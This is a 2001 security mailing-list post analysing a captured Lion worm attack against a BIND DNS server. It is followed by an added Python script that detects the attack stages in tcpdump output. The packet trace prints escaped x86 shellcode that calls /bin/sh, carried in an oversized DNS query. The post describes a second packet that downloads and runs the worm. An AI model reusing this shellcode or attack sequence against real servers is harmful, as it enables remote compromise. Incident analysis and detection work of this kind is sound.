Security Incidents mailing list archives

Lion TCPdump Trace


From: Joshua Krage <jkrage () BUSER NET>
Date: Tue, 27 Mar 2001 18:43:13 -0500

I'm pasting in an edited "tcpdump -nv" output file of a captured Lion
attack sequence.  I'm also enclosing the 3.5k TCPdump source file I used
for the dump.  Interestingly, using "-vv" flag with TCPdump on OpenBSD
2.8-current will dump core.

I've munged the MAC and IP addresses to protect the capture source
(FDDI ring, MTU 4500).  Packet Checksums are all munged due to my edits.
The output below is missing the snap header and the bad checksum warnings
you will see if you run TCPdump on the source file.

Note the particular sequence of the UDP and TCP DNS requests, including
the deliberately stalled (open) TCP connection.  The UDP request sends
/bin/sh, but the TCP packet has the attack payload.
  - The UDP packet at 18:21:16.894258 contains the /bin/sh and shell code
    calls.
  - The TCP packet at 18:21:17.903803 contains the attack payload to
    download and execute the worm.


18:21:15.080161 13.14.10.13.4299 > 11.14.14.15.53: S 839911123:839911123(0) win 32120 <mss 1460,sackOK,timestamp 19686696 0,nop,wscale 0> (DF) (ttl 52, id 24722)
18:21:15.085717 11.14.14.15.53 > 13.14.10.13.4299: S 3687140704:3687140704(0) ack 839911124 win 32120 <mss 1460,sackOK,timestamp 33522220 19686696,nop,wscale 0> (DF) (ttl 61, id 5153)
18:21:15.189710 13.14.10.13.4299 > 11.14.14.15.53: . ack 1 win 32120 <nop,nop,timestamp 19686709 33522220> (DF) (ttl 52, id 24728)
18:21:15.412368 13.14.10.13.4299 > 11.14.14.15.53: F 1:1(0) ack 1 win 32120 <nop,nop,timestamp 19686731 33522220> (DF) (ttl 52, id 24742)
18:21:15.418616 11.14.14.15.53 > 13.14.10.13.4299: . ack 2 win 32120 <nop,nop,timestamp 33522253 19686731> (DF) (ttl 61, id 5154)
18:21:15.418747 11.14.14.15.53 > 13.14.10.13.4299: F 1:1(0) ack 2 win 32120 <nop,nop,timestamp 33522253 19686731> (DF) (ttl 61, id 5155)
18:21:15.543594 13.14.10.13.4299 > 11.14.14.15.53: . ack 2 win 32120 <nop,nop,timestamp 19686745 33522253> (DF) (ttl 52, id 24743)
18:21:16.523703 13.14.10.13.4330 > 11.14.14.15.53: S 857826494:857826494(0) win 32120 <mss 1460,sackOK,timestamp 19686843 0,nop,wscale 0> (DF) (ttl 52, id 24878)
18:21:16.526752 11.14.14.15.53 > 13.14.10.13.4330: S 3679763989:3679763989(0) ack 857826495 win 32120 <mss 1460,sackOK,timestamp 33522364 19686843,nop,wscale 0> (DF) (ttl 61, id 5156)
18:21:16.647421 13.14.10.13.4330 > 11.14.14.15.53: . ack 1 win 32120 <nop,nop,timestamp 19686854 33522364> (DF) (ttl 52, id 24879)
18:21:16.746834 13.14.10.13.1026 > 11.14.14.15.53:  43981 inv_q+ [b2&3=0x980] A? . (23) (ttl 52, id 24880)
18:21:16.758812 11.14.14.15.53 > 13.14.10.13.1026:  43981 inv_q FormErr [0q] 1/0/0    
^Band^@^@^P^@^C^GVERSION^DBIND^@^@^P^@^C^@^@. (Class 1541) Type0 (632) (ttl 61, id 5157)
18:21:16.894258 13.14.10.13.1026 > 11.14.14.15.53:  43981+ [2q] [1au] A? 
M-^PM-^PM-^PM-k;1M-[_M-^CM-o|M-^Mw^PM-^Iw^DM-^MO 
M-^IO^HM-3^PM-^I^Y1M-IM-1M-^?M-^I^OQ1M-@M-0fM-3^GM-^IM-yM-MM-^@Y1M-[9M-Xu^JfM-;^PM-jf9^^Bt^HM-bM-`.M-hM-@M-^?M-^?M-^?M-^IM-K1M-IM-1^C1M-@M-0?IM-MM-^@AM-bM-vM-k^T1M-@[M-^MK^TM-^I^YM-^IC^XM-^HC^G1M-RM-0^KM-MM-^@M-hM-gM-^?M-^?M-^?/bin/shM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P.M-^I.^L.N.M-k.M-@.^@.^@.?.^B.C.f.M-^@.^.C.M-0.M-M.M-^I.^L.V.M-0.C.M-^@.M-5.@.M-P.^H.M-{.M-?.M-{.M-?.L.^H.^@.^@.M-P.^H.M-`.@.M-^L.^H.^@.^@.^@.^@.^@.^@.M-{.M-?.M-^F.^H.^@.^@.M-P.^H.M-`.@.M-^L.^H.M-{.M-?.M-^D.^H.M-`.@.
 (509) (ttl 52, id 24882)
18:21:16.903590 11.14.14.15.53 > 13.14.10.13.1026:  43981 FormErr [0q] 0/0/0 (12) (ttl 61, id 5158)
18:21:17.903803 13.14.10.13.4330 > 11.14.14.15.53: P 1:501(500) ack 1 win 32120 <nop,nop,timestamp 19686980 33522364> (DF) (ttl 52, id 25000)
18:21:17.903815 13.14.10.13.4330 > 11.14.14.15.53: F 501:501(0) ack 1 win 32120 <nop,nop,timestamp 19686980 33522364> (DF) (ttl 52, id 25001)
18:21:17.911091 11.14.14.15.53 > 13.14.10.13.4330: . ack 501 win 31856 <nop,nop,timestamp 33522502 19686980> (DF) (ttl 61, id 5159)
18:21:17.911102 11.14.14.15.53 > 13.14.10.13.4330: . ack 502 win 31856 <nop,nop,timestamp 33522502 19686980> (DF) (ttl 61, id 5160)
18:21:17.969870 11.14.14.15.53 > 13.14.10.13.4330: P 1:15(14) ack 502 win 31856 <nop,nop,timestamp 33522508 19686980> (DF) (ttl 61, id 5161)
18:21:17.969878 11.14.14.15.53 > 13.14.10.13.4330: F 15:15(0) ack 502 win 31856 <nop,nop,timestamp 33522508 19686980> (DF) (ttl 61, id 5162)
18:21:18.083924 13.14.10.13.4330 > 11.14.14.15.53: R 857826996:857826996(0) win 0 (ttl 243, id 25018)
18:21:18.088165 13.14.10.13.4330 > 11.14.14.15.53: R 857826996:857826996(0) win 0 (ttl 243, id 25019)

Attachment: lion.td
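Added example, not part of the original post: a small Python triage script that reads "tcpdump -nv" lines like the ones above and flags the three stages the post points out (the inverse-query BIND version probe, the oversized UDP query carrying /bin/sh, and data pushed on the TCP port-53 connection after it sat open). The sample lines are copied from the capture with the 509-byte query abbreviated; the 300-byte size threshold and 1-second stall threshold are assumed values, not anything from the post.

```python
import re

# Constructed sample: tcpdump -nv lines from the capture above. The 509-byte
# query is abbreviated ("..."); the real line carries the whole payload as cat -v text.
SAMPLE = """\
18:21:16.523703 13.14.10.13.4330 > 11.14.14.15.53: S 857826494:857826494(0) win 32120 <mss 1460,sackOK,timestamp 19686843 0,nop,wscale 0> (DF) (ttl 52, id 24878)
18:21:16.746834 13.14.10.13.1026 > 11.14.14.15.53:  43981 inv_q+ [b2&3=0x980] A? . (23) (ttl 52, id 24880)
18:21:16.894258 13.14.10.13.1026 > 11.14.14.15.53:  43981+ [2q] [1au] A? M-^PM-^PM-^PM-k;1M-[_...M-hM-gM-^?M-^?M-^?/bin/shM-^PM-^P... (509) (ttl 52, id 24882)
18:21:17.903803 13.14.10.13.4330 > 11.14.14.15.53: P 1:501(500) ack 1 win 32120 <nop,nop,timestamp 19686980 33522364> (DF) (ttl 52, id 25000)
"""

LINE = re.compile(r"^(\d\d):(\d\d):(\d\d\.\d+) (\S+) > (\S+): (.*)$")
UDP_LEN = re.compile(r"\((\d+)\) \(ttl ")          # "(509) (ttl 52, ..." -> datagram length
TCP_PUSH = re.compile(r"\bP \d+:\d+\((\d+)\)")    # "P 1:501(500)"        -> pushed payload

def endpoint(s):
    """Split tcpdump's 'a.b.c.d.port' into (host, port)."""
    host, port = s.rsplit(".", 1)
    return host, int(port)

def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    h, mi, sec, src, dst, rest = m.groups()
    t = int(h) * 3600 + int(mi) * 60 + float(sec)   # seconds since midnight
    return t, endpoint(src), endpoint(dst), rest

def analyze(text, max_udp_query=300, min_stall=1.0):
    """Return (src_ip, time, finding) tuples for Lion-like traffic toward port 53."""
    findings, syn_seen = [], {}
    for line in text.splitlines():
        p = parse(line)
        if not p or p[2][1] != 53:                   # only packets sent to the DNS server
            continue
        t, (sip, sport), _, rest = p
        if "inv_q" in rest:                          # inverse query used to fingerprint BIND
            findings.append((sip, t, "inverse query: BIND version probe"))
        elif rest.startswith("S "):                  # remember when the TCP flow was opened
            syn_seen[(sip, sport)] = t
        elif TCP_PUSH.search(rest) and (sip, sport) in syn_seen:
            stall = t - syn_seen[(sip, sport)]       # data arriving on a deliberately idle flow
            if stall >= min_stall:
                findings.append((sip, t, f"TCP DNS data after {stall:.1f}s idle open connection"))
        elif (m := UDP_LEN.search(rest)) and "A?" in rest:
            size = int(m.group(1))
            if size > max_udp_query or "/bin/sh" in rest:
                findings.append((sip, t, f"oversized UDP query ({size} bytes) carrying /bin/sh"))
    return findings
```

Run against a full capture, the same source IP producing all three findings within a couple of seconds is the pattern the post describes; the version probe alone is common scanner noise.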